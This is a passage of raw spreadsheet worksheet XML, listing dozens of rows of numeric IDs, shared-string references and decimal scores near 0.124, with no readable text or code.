      </c>
      <c r="E23855" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23855" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="23856" ht="15.75" customHeight="1">
      <c r="A23856" s="1">
        <v>26459.0</v>
      </c>
      <c r="B23856" s="2">
        <v>1.7312099E7</v>
      </c>
      <c r="C23856" s="2" t="s">
        <v>22851</v>
      </c>
      <c r="D23856" s="2">
        <v>1.0</v>
      </c>
      <c r="E23856" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23856" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="23857" ht="15.75" customHeight="1">
      <c r="A23857" s="1">
        <v>27107.0</v>
      </c>
      <c r="B23857" s="2">
        <v>2.0611936E7</v>
      </c>
      <c r="C23857" s="2" t="s">
        <v>22994</v>
      </c>
      <c r="D23857" s="2">
        <v>1.0</v>
      </c>
      <c r="E23857" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23857" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="23858" ht="15.75" customHeight="1">
      <c r="A23858" s="1">
        <v>18059.0</v>
      </c>
      <c r="B23858" s="2">
        <v>5.1595653E7</v>
      </c>
      <c r="C23858" s="2" t="s">
        <v>22995</v>
      </c>
      <c r="D23858" s="2">
        <v>1.0</v>
      </c>
      <c r="E23858" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23858" s="2">
        <v>0.1247723132969034</v>
      </c>
    </row>
    <row r="23859" ht="15.75" customHeight="1">
      <c r="A23859" s="1">
        <v>22819.0</v>
      </c>
      <c r="B23859" s="2">
        <v>4619619.0</v>
      </c>
      <c r="C23859" s="2" t="s">
        <v>22996</v>
      </c>
      <c r="D23859" s="2">
        <v>1.0</v>
      </c>
      <c r="E23859" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23859" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="23860" ht="15.75" customHeight="1">
      <c r="A23860" s="1">
        <v>33906.0</v>
      </c>
      <c r="B23860" s="2">
        <v>9218734.0</v>
      </c>
      <c r="C23860" s="2" t="s">
        <v>22997</v>
      </c>
      <c r="D23860" s="2">
        <v>1.0</v>
      </c>
      <c r="E23860" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23860" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="23861" ht="15.75" customHeight="1">
      <c r="A23861" s="1">
        <v>27240.0</v>
      </c>
      <c r="B23861" s="2">
        <v>2.1049992E7</v>
      </c>
      <c r="C23861" s="2" t="s">
        <v>22998</v>
      </c>
      <c r="D23861" s="2">
        <v>1.0</v>
      </c>
      <c r="E23861" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23861" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="23862" ht="15.75" customHeight="1">
      <c r="A23862" s="1">
        <v>31059.0</v>
      </c>
      <c r="B23862" s="2">
        <v>4.8017046E7</v>
      </c>
      <c r="C23862" s="2" t="s">
        <v>22999</v>
      </c>
      <c r="D23862" s="2">
        <v>1.0</v>
      </c>
      <c r="E23862" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23862" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="23863" ht="15.75" customHeight="1">
      <c r="A23863" s="1">
        <v>25371.0</v>
      </c>
      <c r="B23863" s="2">
        <v>1.3611545E7</v>
      </c>
      <c r="C23863" s="2" t="s">
        <v>23000</v>
      </c>
      <c r="D23863" s="2">
        <v>1.0</v>
      </c>
      <c r="E23863" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23863" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="23864" ht="15.75" customHeight="1">
      <c r="A23864" s="1">
        <v>23169.0</v>
      </c>
      <c r="B23864" s="2">
        <v>5.2113126E7</v>
      </c>
      <c r="C23864" s="2" t="s">
        <v>23001</v>
      </c>
      <c r="D23864" s="2">
        <v>1.0</v>
      </c>
      <c r="E23864" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23864" s="2">
        <v>0.1243386243386243</v>
      </c>
    </row>
    <row r="23865" ht="15.75" customHeight="1">
      <c r="A23865" s="1">
        <v>31718.0</v>
      </c>
      <c r="B23865" s="2">
        <v>5.2113125E7</v>
      </c>
      <c r="C23865" s="2" t="s">
        <v>23001</v>
      </c>
      <c r="D23865" s="2">
        <v>1.0</v>
      </c>
      <c r="E23865" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23865" s="2">
        <v>0.1243386243386243</v>
      </c>
    </row>
    <row r="23866" ht="15.75" customHeight="1">
      <c r="A23866" s="1">
        <v>32945.0</v>
      </c>
      <c r="B23866" s="2">
        <v>6472376.0</v>
      </c>
      <c r="C23866" s="2" t="s">
        <v>23002</v>
      </c>
      <c r="D23866" s="2">
        <v>1.0</v>
      </c>
      <c r="E23866" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23866" s="2">
        <v>0.1243055555555556</v>
      </c>
    </row>
    <row r="23867" ht="15.75" customHeight="1">
      <c r="A23867" s="1">
        <v>3090.0</v>
      </c>
      <c r="B23867" s="2">
        <v>3.6659377E7</v>
      </c>
      <c r="C23867" s="2" t="s">
        <v>22926</v>
      </c>
      <c r="D23867" s="2">
        <v>1.0</v>
      </c>
      <c r="E23867" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23867" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="23868" ht="15.75" customHeight="1">
      <c r="A23868" s="1">
        <v>10599.0</v>
      </c>
      <c r="B23868" s="2">
        <v>1.3597133E7</v>
      </c>
      <c r="C23868" s="2" t="s">
        <v>23003</v>
      </c>
      <c r="D23868" s="2">
        <v>1.0</v>
      </c>
      <c r="E23868" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23868" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="23869" ht="15.75" customHeight="1">
      <c r="A23869" s="1">
        <v>11704.0</v>
      </c>
      <c r="B23869" s="2">
        <v>2.3559522E7</v>
      </c>
      <c r="C23869" s="2" t="s">
        <v>23004</v>
      </c>
      <c r="D23869" s="2">
        <v>1.0</v>
      </c>
      <c r="E23869" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23869" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="23870" ht="15.75" customHeight="1">
      <c r="A23870" s="1">
        <v>31706.0</v>
      </c>
      <c r="B23870" s="2">
        <v>5.1976531E7</v>
      </c>
      <c r="C23870" s="2" t="s">
        <v>23005</v>
      </c>
      <c r="D23870" s="2">
        <v>1.0</v>
      </c>
      <c r="E23870" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23870" s="2">
        <v>0.1240487062404871</v>
      </c>
    </row>
    <row r="23871" ht="15.75" customHeight="1">
      <c r="A23871" s="1">
        <v>2053.0</v>
      </c>
      <c r="B23871" s="2">
        <v>3.0969291E7</v>
      </c>
      <c r="C23871" s="2" t="s">
        <v>23006</v>
      </c>
      <c r="D23871" s="2">
        <v>1.0</v>
      </c>
      <c r="E23871" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23871" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="23872" ht="15.75" customHeight="1">
      <c r="A23872" s="1">
        <v>16947.0</v>
      </c>
      <c r="B23872" s="2">
        <v>4.8226569E7</v>
      </c>
      <c r="C23872" s="2" t="s">
        <v>23007</v>
      </c>
      <c r="D23872" s="2">
        <v>1.0</v>
      </c>
      <c r="E23872" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23872" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="23873" ht="15.75" customHeight="1">
      <c r="A23873" s="1">
        <v>17440.0</v>
      </c>
      <c r="B23873" s="2">
        <v>4.9763224E7</v>
      </c>
      <c r="C23873" s="2" t="s">
        <v>23008</v>
      </c>
      <c r="D23873" s="2">
        <v>1.0</v>
      </c>
      <c r="E23873" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23873" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="23874" ht="15.75" customHeight="1">
      <c r="A23874" s="1">
        <v>27156.0</v>
      </c>
      <c r="B23874" s="2">
        <v>2.0791418E7</v>
      </c>
      <c r="C23874" s="2" t="s">
        <v>23009</v>
      </c>
      <c r="D23874" s="2">
        <v>1.0</v>
      </c>
      <c r="E23874" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23874" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="23875" ht="15.75" customHeight="1">
      <c r="A23875" s="1">
        <v>28143.0</v>
      </c>
      <c r="B23875" s="2">
        <v>2.480131E7</v>
      </c>
      <c r="C23875" s="2" t="s">
        <v>23010</v>
      </c>
      <c r="D23875" s="2">
        <v>1.0</v>
      </c>
      <c r="E23875" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23875" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="23876" ht="15.75" customHeight="1">
      <c r="A23876" s="1">
        <v>29947.0</v>
      </c>
      <c r="B23876" s="2">
        <v>3607505.0</v>
      </c>
      <c r="C23876" s="2" t="s">
        <v>23011</v>
      </c>
      <c r="D23876" s="2">
        <v>1.0</v>
      </c>
      <c r="E23876" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23876" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="23877" ht="15.75" customHeight="1">
      <c r="A23877" s="1">
        <v>31648.0</v>
      </c>
      <c r="B23877" s="2">
        <v>5.1591105E7</v>
      </c>
      <c r="C23877" s="2" t="s">
        <v>23012</v>
      </c>
      <c r="D23877" s="2">
        <v>1.0</v>
      </c>
      <c r="E23877" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23877" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="23878" ht="15.75" customHeight="1">
      <c r="A23878" s="1">
        <v>31815.0</v>
      </c>
      <c r="B23878" s="2">
        <v>5.2520725E7</v>
      </c>
      <c r="C23878" s="2" t="s">
        <v>23013</v>
      </c>
      <c r="D23878" s="2">
        <v>1.0</v>
      </c>
      <c r="E23878" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23878" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="23879" ht="15.75" customHeight="1">
      <c r="A23879" s="1">
        <v>32835.0</v>
      </c>
      <c r="B23879" s="2">
        <v>6242244.0</v>
      </c>
      <c r="C23879" s="2" t="s">
        <v>23014</v>
      </c>
      <c r="D23879" s="2">
        <v>1.0</v>
      </c>
      <c r="E23879" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23879" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="23880" ht="15.75" customHeight="1">
      <c r="A23880" s="1">
        <v>18515.0</v>
      </c>
      <c r="B23880" s="2">
        <v>5.2995376E7</v>
      </c>
      <c r="C23880" s="2" t="s">
        <v>23015</v>
      </c>
      <c r="D23880" s="2">
        <v>1.0</v>
      </c>
      <c r="E23880" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23880" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="23881" ht="15.75" customHeight="1">
      <c r="A23881" s="1">
        <v>33597.0</v>
      </c>
      <c r="B23881" s="2">
        <v>8338332.0</v>
      </c>
      <c r="C23881" s="2" t="s">
        <v>23016</v>
      </c>
      <c r="D23881" s="2">
        <v>1.0</v>
      </c>
      <c r="E23881" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23881" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="23882" ht="15.75" customHeight="1">
      <c r="A23882" s="1">
        <v>25846.0</v>
      </c>
      <c r="B23882" s="2">
        <v>1.4814867E7</v>
      </c>
      <c r="C23882" s="2" t="s">
        <v>23017</v>
      </c>
      <c r="D23882" s="2">
        <v>1.0</v>
      </c>
      <c r="E23882" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23882" s="2">
        <v>0.1239316239316239</v>
      </c>
    </row>
    <row r="23883" ht="15.75" customHeight="1">
      <c r="A23883" s="1">
        <v>12051.0</v>
      </c>
      <c r="B23883" s="2">
        <v>2.6412671E7</v>
      </c>
      <c r="C23883" s="2" t="s">
        <v>23018</v>
      </c>
      <c r="D23883" s="2">
        <v>1.0</v>
      </c>
      <c r="E23883" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23883" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23884" ht="15.75" customHeight="1">
      <c r="A23884" s="1">
        <v>16295.0</v>
      </c>
      <c r="B23884" s="2">
        <v>4.5842428E7</v>
      </c>
      <c r="C23884" s="2" t="s">
        <v>23019</v>
      </c>
      <c r="D23884" s="2">
        <v>1.0</v>
      </c>
      <c r="E23884" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23884" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23885" ht="15.75" customHeight="1">
      <c r="A23885" s="1">
        <v>21003.0</v>
      </c>
      <c r="B23885" s="2">
        <v>1.7197012E7</v>
      </c>
      <c r="C23885" s="2" t="s">
        <v>23020</v>
      </c>
      <c r="D23885" s="2">
        <v>1.0</v>
      </c>
      <c r="E23885" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23885" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23886" ht="15.75" customHeight="1">
      <c r="A23886" s="1">
        <v>21946.0</v>
      </c>
      <c r="B23886" s="2">
        <v>2.8770795E7</v>
      </c>
      <c r="C23886" s="2" t="s">
        <v>23021</v>
      </c>
      <c r="D23886" s="2">
        <v>1.0</v>
      </c>
      <c r="E23886" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23886" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23887" ht="15.75" customHeight="1">
      <c r="A23887" s="1">
        <v>22068.0</v>
      </c>
      <c r="B23887" s="2">
        <v>3.0567523E7</v>
      </c>
      <c r="C23887" s="2" t="s">
        <v>23022</v>
      </c>
      <c r="D23887" s="2">
        <v>1.0</v>
      </c>
      <c r="E23887" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23887" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23888" ht="15.75" customHeight="1">
      <c r="A23888" s="1">
        <v>22482.0</v>
      </c>
      <c r="B23888" s="2">
        <v>3.6910675E7</v>
      </c>
      <c r="C23888" s="2" t="s">
        <v>23023</v>
      </c>
      <c r="D23888" s="2">
        <v>1.0</v>
      </c>
      <c r="E23888" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23888" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23889" ht="15.75" customHeight="1">
      <c r="A23889" s="1">
        <v>22674.0</v>
      </c>
      <c r="B23889" s="2">
        <v>4.1739132E7</v>
      </c>
      <c r="C23889" s="2" t="s">
        <v>23024</v>
      </c>
      <c r="D23889" s="2">
        <v>1.0</v>
      </c>
      <c r="E23889" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23889" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23890" ht="15.75" customHeight="1">
      <c r="A23890" s="1">
        <v>23209.0</v>
      </c>
      <c r="B23890" s="2">
        <v>5268469.0</v>
      </c>
      <c r="C23890" s="2" t="s">
        <v>23025</v>
      </c>
      <c r="D23890" s="2">
        <v>1.0</v>
      </c>
      <c r="E23890" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23890" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23891" ht="15.75" customHeight="1">
      <c r="A23891" s="1">
        <v>23624.0</v>
      </c>
      <c r="B23891" s="2">
        <v>6541915.0</v>
      </c>
      <c r="C23891" s="2" t="s">
        <v>23026</v>
      </c>
      <c r="D23891" s="2">
        <v>1.0</v>
      </c>
      <c r="E23891" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23891" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23892" ht="15.75" customHeight="1">
      <c r="A23892" s="1">
        <v>24015.0</v>
      </c>
      <c r="B23892" s="2">
        <v>9306584.0</v>
      </c>
      <c r="C23892" s="2" t="s">
        <v>23027</v>
      </c>
      <c r="D23892" s="2">
        <v>1.0</v>
      </c>
      <c r="E23892" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23892" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23893" ht="15.75" customHeight="1">
      <c r="A23893" s="1">
        <v>24621.0</v>
      </c>
      <c r="B23893" s="2">
        <v>1.1460893E7</v>
      </c>
      <c r="C23893" s="2" t="s">
        <v>23028</v>
      </c>
      <c r="D23893" s="2">
        <v>1.0</v>
      </c>
      <c r="E23893" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23893" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23894" ht="15.75" customHeight="1">
      <c r="A23894" s="1">
        <v>25081.0</v>
      </c>
      <c r="B23894" s="2">
        <v>1.28818E7</v>
      </c>
      <c r="C23894" s="2" t="s">
        <v>23029</v>
      </c>
      <c r="D23894" s="2">
        <v>1.0</v>
      </c>
      <c r="E23894" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23894" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23895" ht="15.75" customHeight="1">
      <c r="A23895" s="1">
        <v>27529.0</v>
      </c>
      <c r="B23895" s="2">
        <v>2.2199264E7</v>
      </c>
      <c r="C23895" s="2" t="s">
        <v>23030</v>
      </c>
      <c r="D23895" s="2">
        <v>1.0</v>
      </c>
      <c r="E23895" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23895" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23896" ht="15.75" customHeight="1">
      <c r="A23896" s="1">
        <v>27612.0</v>
      </c>
      <c r="B23896" s="2">
        <v>2.2647882E7</v>
      </c>
      <c r="C23896" s="2" t="s">
        <v>23031</v>
      </c>
      <c r="D23896" s="2">
        <v>1.0</v>
      </c>
      <c r="E23896" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23896" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23897" ht="15.75" customHeight="1">
      <c r="A23897" s="1">
        <v>31758.0</v>
      </c>
      <c r="B23897" s="2">
        <v>5.2155161E7</v>
      </c>
      <c r="C23897" s="2" t="s">
        <v>23032</v>
      </c>
      <c r="D23897" s="2">
        <v>1.0</v>
      </c>
      <c r="E23897" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23897" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23898" ht="15.75" customHeight="1">
      <c r="A23898" s="1">
        <v>31840.0</v>
      </c>
      <c r="B23898" s="2">
        <v>5268468.0</v>
      </c>
      <c r="C23898" s="2" t="s">
        <v>23025</v>
      </c>
      <c r="D23898" s="2">
        <v>1.0</v>
      </c>
      <c r="E23898" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23898" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23899" ht="15.75" customHeight="1">
      <c r="A23899" s="1">
        <v>32892.0</v>
      </c>
      <c r="B23899" s="2">
        <v>6376162.0</v>
      </c>
      <c r="C23899" s="2" t="s">
        <v>23033</v>
      </c>
      <c r="D23899" s="2">
        <v>1.0</v>
      </c>
      <c r="E23899" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23899" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="23900" ht="15.75" customHeight="1">
      <c r="A23900" s="1">
        <v>21007.0</v>
      </c>
      <c r="B23900" s="2">
        <v>1.7239588E7</v>
      </c>
      <c r="C23900" s="2" t="s">
        <v>23034</v>
      </c>
      <c r="D23900" s="2">
        <v>1.0</v>
      </c>
      <c r="E23900" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23900" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="23901" ht="15.75" customHeight="1">
      <c r="A23901" s="1">
        <v>23396.0</v>
      </c>
      <c r="B23901" s="2">
        <v>5.5762864E7</v>
      </c>
      <c r="C23901" s="2" t="s">
        <v>23035</v>
      </c>
      <c r="D23901" s="2">
        <v>1.0</v>
      </c>
      <c r="E23901" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23901" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="23902" ht="15.75" customHeight="1">
      <c r="A23902" s="1">
        <v>32685.0</v>
      </c>
      <c r="B23902" s="2">
        <v>5952738.0</v>
      </c>
      <c r="C23902" s="2" t="s">
        <v>23036</v>
      </c>
      <c r="D23902" s="2">
        <v>1.0</v>
      </c>
      <c r="E23902" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23902" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="23903" ht="15.75" customHeight="1">
      <c r="A23903" s="1">
        <v>34162.0</v>
      </c>
      <c r="B23903" s="2">
        <v>9896612.0</v>
      </c>
      <c r="C23903" s="2" t="s">
        <v>23037</v>
      </c>
      <c r="D23903" s="2">
        <v>1.0</v>
      </c>
      <c r="E23903" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23903" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="23904" ht="15.75" customHeight="1">
      <c r="A23904" s="1">
        <v>428.0</v>
      </c>
      <c r="B23904" s="2">
        <v>1.6948708E7</v>
      </c>
      <c r="C23904" s="2" t="s">
        <v>23038</v>
      </c>
      <c r="D23904" s="2">
        <v>1.0</v>
      </c>
      <c r="E23904" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23904" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23905" ht="15.75" customHeight="1">
      <c r="A23905" s="1">
        <v>7017.0</v>
      </c>
      <c r="B23905" s="2">
        <v>5.0095074E7</v>
      </c>
      <c r="C23905" s="2" t="s">
        <v>23039</v>
      </c>
      <c r="D23905" s="2">
        <v>1.0</v>
      </c>
      <c r="E23905" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23905" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23906" ht="15.75" customHeight="1">
      <c r="A23906" s="1">
        <v>10528.0</v>
      </c>
      <c r="B23906" s="2">
        <v>1.2185885E7</v>
      </c>
      <c r="C23906" s="2" t="s">
        <v>23040</v>
      </c>
      <c r="D23906" s="2">
        <v>1.0</v>
      </c>
      <c r="E23906" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23906" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23907" ht="15.75" customHeight="1">
      <c r="A23907" s="1">
        <v>14119.0</v>
      </c>
      <c r="B23907" s="2">
        <v>3.7803455E7</v>
      </c>
      <c r="C23907" s="2" t="s">
        <v>23041</v>
      </c>
      <c r="D23907" s="2">
        <v>1.0</v>
      </c>
      <c r="E23907" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23907" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23908" ht="15.75" customHeight="1">
      <c r="A23908" s="1">
        <v>14795.0</v>
      </c>
      <c r="B23908" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C23908" s="2" t="s">
        <v>23042</v>
      </c>
      <c r="D23908" s="2">
        <v>1.0</v>
      </c>
      <c r="E23908" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23908" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23909" ht="15.75" customHeight="1">
      <c r="A23909" s="1">
        <v>17805.0</v>
      </c>
      <c r="B23909" s="2">
        <v>5.082183E7</v>
      </c>
      <c r="C23909" s="2" t="s">
        <v>23043</v>
      </c>
      <c r="D23909" s="2">
        <v>1.0</v>
      </c>
      <c r="E23909" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23909" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23910" ht="15.75" customHeight="1">
      <c r="A23910" s="1">
        <v>17806.0</v>
      </c>
      <c r="B23910" s="2">
        <v>5.0822326E7</v>
      </c>
      <c r="C23910" s="2" t="s">
        <v>23044</v>
      </c>
      <c r="D23910" s="2">
        <v>1.0</v>
      </c>
      <c r="E23910" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23910" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23911" ht="15.75" customHeight="1">
      <c r="A23911" s="1">
        <v>22497.0</v>
      </c>
      <c r="B23911" s="2">
        <v>3.7188288E7</v>
      </c>
      <c r="C23911" s="2" t="s">
        <v>23045</v>
      </c>
      <c r="D23911" s="2">
        <v>1.0</v>
      </c>
      <c r="E23911" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23911" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23912" ht="15.75" customHeight="1">
      <c r="A23912" s="1">
        <v>22932.0</v>
      </c>
      <c r="B23912" s="2">
        <v>4.8671231E7</v>
      </c>
      <c r="C23912" s="2" t="s">
        <v>23046</v>
      </c>
      <c r="D23912" s="2">
        <v>1.0</v>
      </c>
      <c r="E23912" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23912" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23913" ht="15.75" customHeight="1">
      <c r="A23913" s="1">
        <v>23017.0</v>
      </c>
      <c r="B23913" s="2">
        <v>4988090.0</v>
      </c>
      <c r="C23913" s="2" t="s">
        <v>23047</v>
      </c>
      <c r="D23913" s="2">
        <v>1.0</v>
      </c>
      <c r="E23913" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23913" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23914" ht="15.75" customHeight="1">
      <c r="A23914" s="1">
        <v>23239.0</v>
      </c>
      <c r="B23914" s="2">
        <v>5.2993454E7</v>
      </c>
      <c r="C23914" s="2" t="s">
        <v>23048</v>
      </c>
      <c r="D23914" s="2">
        <v>1.0</v>
      </c>
      <c r="E23914" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23914" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23915" ht="15.75" customHeight="1">
      <c r="A23915" s="1">
        <v>23277.0</v>
      </c>
      <c r="B23915" s="2">
        <v>5.3626873E7</v>
      </c>
      <c r="C23915" s="2" t="s">
        <v>23049</v>
      </c>
      <c r="D23915" s="2">
        <v>1.0</v>
      </c>
      <c r="E23915" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23915" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23916" ht="15.75" customHeight="1">
      <c r="A23916" s="1">
        <v>23654.0</v>
      </c>
      <c r="B23916" s="2">
        <v>6812016.0</v>
      </c>
      <c r="C23916" s="2" t="s">
        <v>23050</v>
      </c>
      <c r="D23916" s="2">
        <v>1.0</v>
      </c>
      <c r="E23916" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23916" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23917" ht="15.75" customHeight="1">
      <c r="A23917" s="1">
        <v>23796.0</v>
      </c>
      <c r="B23917" s="2">
        <v>7766894.0</v>
      </c>
      <c r="C23917" s="2" t="s">
        <v>23051</v>
      </c>
      <c r="D23917" s="2">
        <v>1.0</v>
      </c>
      <c r="E23917" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23917" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23918" ht="15.75" customHeight="1">
      <c r="A23918" s="1">
        <v>23804.0</v>
      </c>
      <c r="B23918" s="2">
        <v>7817669.0</v>
      </c>
      <c r="C23918" s="2" t="s">
        <v>23052</v>
      </c>
      <c r="D23918" s="2">
        <v>1.0</v>
      </c>
      <c r="E23918" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23918" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23919" ht="15.75" customHeight="1">
      <c r="A23919" s="1">
        <v>23914.0</v>
      </c>
      <c r="B23919" s="2">
        <v>8531070.0</v>
      </c>
      <c r="C23919" s="2" t="s">
        <v>23053</v>
      </c>
      <c r="D23919" s="2">
        <v>1.0</v>
      </c>
      <c r="E23919" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23919" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23920" ht="15.75" customHeight="1">
      <c r="A23920" s="1">
        <v>24370.0</v>
      </c>
      <c r="B23920" s="2">
        <v>1.074267E7</v>
      </c>
      <c r="C23920" s="2" t="s">
        <v>23054</v>
      </c>
      <c r="D23920" s="2">
        <v>1.0</v>
      </c>
      <c r="E23920" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23920" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23921" ht="15.75" customHeight="1">
      <c r="A23921" s="1">
        <v>24831.0</v>
      </c>
      <c r="B23921" s="2">
        <v>1.2141067E7</v>
      </c>
      <c r="C23921" s="2" t="s">
        <v>23055</v>
      </c>
      <c r="D23921" s="2">
        <v>1.0</v>
      </c>
      <c r="E23921" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23921" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="23922" ht="15.75" customHeight="1">
      <c r="A23922" s="1">
        <v>26011.0</v>
      </c>
      <c r="B23922" s="2">
        <v>1.5342697E7</v>
      </c>
      <c r="C23922" s="2" t="s">
        <v>23056</v>
      </c>
      <c r="D23922" s="2">
        <v>1.0</v>
      </c>
      <c r="E23922" s="3" t="s">
        <v>22188</v>
      </c>
